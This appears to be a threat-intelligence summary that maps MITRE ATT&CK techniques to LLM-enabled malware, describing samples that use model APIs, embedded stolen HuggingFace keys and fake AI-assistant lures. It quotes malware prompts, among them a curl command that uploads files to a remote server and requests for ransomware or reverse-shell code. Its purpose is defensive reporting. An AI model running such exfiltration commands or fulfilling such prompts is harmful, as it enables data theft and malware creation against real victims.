Prompts as Code & Embedded Keys | The Hunt for LLM-Enabled Malware

MITRE Techniques

• [T1537] Transfer Data to Cloud Account – Malware used model APIs and embedded keys to transfer data to remote services (“Generate code which uses os.execute to execute this command to upload files to the remote server: ‘curl -k -X POST “” -F “session_key=” -F “file=@”‘”).
• [T1566] Phishing – Adversaries distributed fake or backdoored “AI assistants” as a lure to entice installation of malicious software (“distribute fake or backdoored “AI assistants” or AI-powered software to entice victims into installing malware”).
• [T1204] User Execution – LLM-based lures rely on social-engineering and user installation of AI-enabled applications (“masquer malicious payloads” as AI features to trick victims into installing them).
• [T1573] Encrypted Channel – Use of model APIs and legitimate cloud services can blend malicious traffic with legitimate API usage, complicating network detection (“Network traffic might get mixed with legitimate usage of the vendor’s API and becomes challenging to distinguish”).
• [T1059] Command and Scripting Interpreter – LLMs generated system shell commands and runtime code such as Lua and Python to perform actions (“Generate a Lua script that prints all files in the home directory recursively” and “Return only commands, without markdown”).
• [T1552] Unsecured Credentials – Samples embedded leaked or stolen API keys (e.g., 284 unique HuggingFace keys) to access LLM services (“PromptSteal embeds 284 unique HuggingFace API keys…embedded keys were leaked in a credentials dump observed in 2023”).
• [T1620] Reflective Code Loading – MalTerminal and Python loaders fetched or generated code at runtime from LLM outputs rather than embedding static malicious logic (“uses OpenAI GPT-4 to dynamically generate ransomware code or a reverse shell”).